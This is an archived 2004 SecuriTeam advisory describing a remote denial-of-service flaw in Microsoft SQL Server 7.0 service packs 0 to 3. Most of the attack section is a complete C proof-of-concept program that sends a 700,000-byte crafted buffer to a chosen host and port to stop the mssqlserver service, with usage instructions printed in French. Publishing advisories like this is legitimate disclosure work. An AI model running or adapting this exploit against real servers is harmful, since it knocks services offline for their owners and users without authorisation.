[EXPL] Microsoft SQL Server DoS

From: SecuriTeam (support_at_securiteam.com)
Date: 10/04/04

Next message: SecuriTeam: "[NEWS] Macromedia JRun4 mod_jrun Apache Module Buffer Overflow"

Previous message: SecuriTeam: "[NEWS] RealPlayer pnen3260.dll Heap Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 4 Oct 2004 14:08:22 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Microsoft SQL Server DoS
------------------------------------------------------------------------

SUMMARY

A vulnerability in Microsoft's SQL server allows an attacker to remotely
trigger a denial of service condition by sending a large buffer with
specially crafted data. The result is that the mssqlserver service is
stopped.

DETAILS

Vulnerable Systems:
* MSSQL Server version 7.0 with Services Packs 1 up to and including 3

By sending a large specially crafted buffer it is possible to stop the
mssqlserver service. The error registered is different depending on the
MSSQL Service Pack install but the result is always the same.

Proof of concept
/* Microsoft mssql 7.0 server is vulnerable to denial of service attack
* By sending a large buffer with specified data an attacker can stop the
service
* "mssqlserver" the error noticed is different according to services'
pack but the result is always
* the same one.
*Exception Codes = c0000005
* vulnerable:MSSQL7.0 sp0 - sp1 - sp2 - sp3
* This code is for educational purposes, I am not responsible for your
acts
* Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */

#include <stdio.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")
u_long resolv(char*);

void main(int argc, char **argv) {
WSADATA WinsockData;
SOCKET s;
int i;
struct sockaddr_in vulh;
char buffer[700000];
for(i=0;i<700000;i+=16)
memcpy(buffer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc",16);

if (argc!=3) {
  printf("MSSQL denial of service\n");
  printf("by securma massine\n");
  printf("Cet outil a ete cree pour test ,je ne suis en aucun cas
responsable des degats que vous pouvez en faire\n");
  printf("Syntaxe: MSSQLdos <ip> <port>\n");
  exit(1);
}

WSAStartup(0x101,&WinsockData);
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));
vulh.sin_family=AF_INET;
vulh.sin_addr.s_addr=resolv(argv[1]);
vulh.sin_port=htons(atoi(argv[2]));
if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) {
printf("Impossible de se connecter...le port est en generale
1433...\n");
exit(1);
}

  {
  send(s,buffer,sizeof(buffer),0);

  printf("Data envoyes...\n");
}
printf("\nattendez quelques secondes et verifiez que le serveur ne repond
plus.\n");
closesocket(s);
WSACleanup();
}

u_long resolv(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1) {
  if (!(host_ent = gethostbyname(host_name))) {
   printf ("Erreur DNS : Impossible de r soudre l'adresse %s
!!!\n",host_name);
   exit(1);
  }
  CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);
}
return addr.s_addr;
}

ADDITIONAL INFORMATION

The information has been provided by <mailto:securma@caramail.com>
securma@caramail.com.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Next message: SecuriTeam: "[NEWS] Macromedia JRun4 mod_jrun Apache Module Buffer Overflow"

Previous message: SecuriTeam: "[NEWS] RealPlayer pnen3260.dll Heap Overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

[UNIX] LibSPF2 DNS TXT Record Parsing Bug
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... LibSPF2 DNS TXT Record Parsing Bug ... rdlen byte buffer. ...
(Securiteam)
[EXPL] NetTerms NetFTPd Buffer Overflow (USER, Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Win32 telnet client software - "NetTerm is a network terminal which can ... NetTerm's NetFTPd has a buffer overflow on authentication buffer. ... def setebpaddr: ...
(Securiteam)
[UNIX] Conquest Client Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Conquest Client Buffer Overflow ... SP_CLIENTSTAT is a type of packet used by the server for sending some ...
(Securiteam)
[EXPL] Pavuk Digest Authentication Buffer Overflow Exploit
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Authentication Buffer Overflow Vulnerabilities, a buffer overflow ... char *method; ... * the auth_digest pointer, the user pointer, and the buf pointer. ...
(Securiteam)
[NEWS] SAP Internet Graphics Service Buffer Overflow Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... SAP Internet Graphics Service Buffer Overflow Vulnerability ... allow an attacker to execute remote code with the privileges of the SAP ...
(Securiteam)